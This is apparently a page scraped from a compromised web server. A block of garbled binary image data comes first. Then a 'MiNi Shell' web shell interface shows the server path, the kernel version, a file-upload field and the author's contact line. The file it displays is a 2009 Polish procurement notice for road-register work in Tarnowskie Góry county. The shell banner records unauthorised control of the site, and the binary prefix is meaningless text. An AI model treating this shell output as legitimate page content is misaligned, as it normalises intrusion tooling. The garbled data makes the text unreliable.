JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090515/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090515/151446-N-2009.html

<p class="kh_header"><b>Tarnowskie Góry: Przedmiotem zamówienia jest opracowanie ewidencji dróg powiatowych będący w administracji tutejszego Zarządu Dróg na terenie Gmin Tworóg, Krupski Młyn oraz Zbrosławice - ETAP III</b><br>
<b>Numer ogłoszenia: 151446 - 2009; data zamieszczenia: 15.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg  Powiatowych w Tarnowskich Górach , ul. Pyskowicka 54, 42-612 Tarnowskie Góry, woj. śląskie, tel. 032 2854862, faks 032 2854862.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdp.tgory.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest opracowanie ewidencji dróg powiatowych będący w administracji tutejszego Zarządu Dróg na terenie Gmin Tworóg, Krupski Młyn oraz Zbrosławice - ETAP III.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opracowanie jest kontynuacją procesu stabilizacji elementów systemu referencyjnego oraz gromadzenia i wprowadzania danych drogowych do istniejącego zasobu ewidencji dróg, dowiązanych do podstawowej wersji systemu referencyjnego dla wytypowanych odcinków sieci dróg powiatowych na terenie Gmin Tworóg, Krupski Młyn oraz Zbrosławice.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 72.31.90.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Zgodnie z art. 22 ustawy Pzp o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
a) Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
b) Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonywania lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
c) Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
d) Nie są wykluczeni z postępowania na podstawie art. 24 ust 1 i 2 Ustawy Pzp;
e) Przedstawią wykaz usług, zrealizowanych w okresie ostatnich 3 lat, odpowiadających swoim rodzajem i zakresem usługom stanowiącym przedmiot zamówienia wraz z referencjami Zamawiających, potwierdzającymi ich należyte wykonanie.
f) W ostatnich 3 latach, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali zamówienia związane z gromadzeniem drogowych danych ewidencyjnych w dowiązaniu do przyjętego systemu referencyjnego dla łącznej długości odcinków dróg (jezdni) nie mniejszej niż 900 km i posiadają dokumenty Zamawiających, potwierdzające należyte wykonanie tych prac, 
g) W ramach realizacji zamówień, o których mowa w pkt.f, wykonali przynajmniej cztery zamówienia, dla sieci dróg o łącznej długości odcinków nie mniejszej niż 140 km w przypadku każdego zamówienia, polegające na zebraniu i wprowadzeniu danych do bazy danych, obsługiwanej przez program SIBView5. Z dokumentów załączonych do oferty, dotyczących tych zamówień, ma jednoznacznie wynikać potwierdzenie gromadzenia i kodowania danych drogowych do bazy danych programu SIBView5.
h) W ostatnich 3 latach, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali zamówienia związane z wykonaniem minimum dwóch zamówień, związanych ze stabilizacją elementów systemu referencyjnego (przynajmniej w odniesieniu do odcinków międzywęzłowych) dla sieci drogowej o łącznej długości nie mniejszej niż 140km każde zamówienie i jednocześnie wykazaniem, że łączna długość dróg objętych stabilizacją elementów systemu referencyjnego w tym okresie jest nie mniejsza niż 600km.
i) Prace związane z przedmiotem zamówienia wykonają w terminie do dnia 20.11.2009 r.
Ocena spełnienia warunków wymaganych od Wykonawcy zostanie dokonana wg formuły (spełnia - nie spełnia) Nie spełnienie chociażby jednego warunku opisanych w pkt.1 skutkować będzie wykluczeniem Wykonawcy z postępowania. Zamawiający wezwie Wykonawców, którzy nie złożyli dokumentów potwierdzających spełnianie powyższych warunków udziału w postępowaniu do ich uzupełnienia tylko w przypadku określonym art. 26, ust.3 ustawy Pzp..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. W celu potwierdzenia spełnienia warunków udziału w postępowaniu, wykonawca załączy do oferty następujące dokumenty:  
a) wypełniony, podpisany i opieczętowany przez osobę upoważnioną (upoważnione) do reprezentowania Wykonawcy formularz ofertowy według wzoru stanowiącego Załącznik nr 1 do niniejszej SIWZ.
b) oświadczenie o spełnieniu wszystkich warunków udziału w postępowaniu - wzór dokumentu załączony jest do SIWZ (Załącznik nr 2),
c) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
d) podpisany i opieczętowany wzór istotnych postanowień umownych (Załącznik nr 3 do SIWZ).
e) oświadczenie o podwykonawstwie - w przypadku, kiedy wykonawca zamierza powierzyć część zamówienia podwykonawcy, jeżeli tak, to Wykonawca zobowiązany jest do wskazania tej części zamówienia, której wykonanie powierzy podwykonawcom. (Załącznik nr 4 do SIWZ). 
f) wykaz usług (Załącznik nr 5 do SIWZ), zrealizowanych w okresie ostatnich 3 lat, odpowiadających swoim rodzajem i zakresem usługom stanowiącym przedmiot zamówienia wraz z referencjami Zamawiających, potwierdzającymi ich należyte wykonanie i fakt, że w ostatnich 3 latach, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali:
-   zamówienia związane z gromadzeniem drogowych danych ewidencyjnych w dowiązaniu do przyjętego systemu referencyjnego dla łącznej długości odcinków dróg (jezdni) nie mniejszej niż 900 km i posiadają dokumenty Zamawiających, potwierdzające należyte wykonanie tych prac, przy czym w ramach realizacji tych zamówień, wykonali przynajmniej cztery zamówienia, dla sieci dróg o łącznej długości odcinków nie mniejszej niż 140 km w przypadku każdego zamówienia, polegające na zebraniu i wprowadzeniu danych do bazy danych, obsługiwanej przez program SIBView5. Z dokumentów załączonych do oferty, dotyczących tych zamówień, ma jednoznacznie wynikać potwierdzenie gromadzenia i kodowania danych drogowych do bazy danych programu SIBView5,
-    zamówienia związane z wykonaniem minimum dwóch zamówień, związanych ze stabilizacją elementów systemu referencyjnego (przynajmniej w odniesieniu do odcinków międzywęzłowych) dla sieci drogowej o łącznej długości nie mniejszej niż 140km każde zamówienie i jednocześnie wykazaniem, że łączna długość dróg objętych stabilizacją elementów systemu referencyjnego w tym okresie jest nie mniejsza niż 600km i posiadają dokumenty Zamawiających, potwierdzające należyte wykonanie tych prac
g) wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia (Załącznik nr 6), wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia a także zakresu wykonywanych przez nich czynności. Przedstawiony wykaz osób i podmiotów ma stwierdzać , że osoby które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia w przypadku, gdy ustawy nakładają obowiązek posiadania takich uprawnień przedstawiony wykaz osób ma być z uprawnieniami (uprawnienia drogowe - zgodnie z art.13 ustawy (Prawo Budowlane) wraz z zaświadczeniami o członkostwie w Okręgowej Izby Inżynierów Budownictwa, na których widnieje aktualne na dzień składania ofert ubezpieczenie od odpowiedzialności cywilnej - dotyczy również podwykonawców, przewidzianych do realizacji. 
h) stosowne pełnomocnictwo w sytuacjach, w których upoważnienie do podpisania oferty nie wynika z dokumentu dopuszczającego do obrotu prawnego lub umowy cywilnej lub pełnomocnictwo dla Wykonawców (podmiotów) występujących wspólnie.
2. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. 1 ppkt c), składa dokument lub dokumenty, wystawione zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: nie otwarto jego likwidacji ani nie ogłoszono upadłości (dokument powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert).
3. Dokumenty wykonawca załączy do oferty w oryginale lub jako kserokopie. W przypadku dołączenia kserokopii, winny być one potwierdzone za zgodność z oryginałem przez przedstawicieli wykonawcy, wskazanych w dokumencie rejestrowym lub w udzielonym pełnomocnictwie, za wyjątkiem dokumentu pełnomocnictwa, które ma być potwierdzone za zgodność z oryginałem przez notariusza lub mocodawcę.
4. Na kserokopii dokumentu należy zamieścić zapis: (za zgodność z oryginałem) oraz datę i czytelny podpis lub parafkę i pieczątkę imienną. 
5. Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona przez Wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości.
6. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę, koszty tłumaczenia dokumentów i oświadczeń na język polski ponosi Wykonawca.
7. Ocena spełnienia warunków udziału w postępowaniu nastąpi na podstawie oświadczeń i dokumentów złożonych przez Wykonawcę wraz z ofertą zgodnie z zasadą spełnia - nie spełnia..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zdp.bip.info.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Powiatowych w Tarnowskich Górach, 42 - 600 Tarnowskie Góry, ulica Pyskowicka 54.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.05.2009 godzina 09:00, miejsce: Sekretariat tutejszego Zarządu Dróg - pokój nr 10.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com